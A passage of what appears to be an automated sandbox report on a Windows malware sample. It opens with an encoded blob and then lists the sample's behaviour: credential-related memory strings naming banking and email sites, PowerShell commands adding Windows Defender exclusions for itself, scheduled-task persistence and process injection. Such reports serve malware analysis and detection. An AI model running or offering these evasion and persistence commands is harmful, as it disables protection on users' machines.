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
                    Source: tmp3B70.tmp.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: tmp3B70.tmp.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: tmp3B70.tmp.17.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: tmp3B70.tmp.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: tmp3B70.tmp.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: tmp3B70.tmp.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: tmp3B70.tmp.17.drBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: tmp3B70.tmp.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: tmp3B70.tmp.17.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: tmp3B70.tmp.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: tmp3B70.tmp.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: tmp3B70.tmp.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeMemory written: C:\Users\user\AppData\Roaming\VcihjWRO.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeProcess created: C:\Users\user\Desktop\I5pvP0CU6M.exe "C:\Users\user\Desktop\I5pvP0CU6M.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeProcess created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Users\user\Desktop\I5pvP0CU6M.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Users\user\Desktop\I5pvP0CU6M.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Users\user\AppData\Roaming\VcihjWRO.exe VolumeInformation
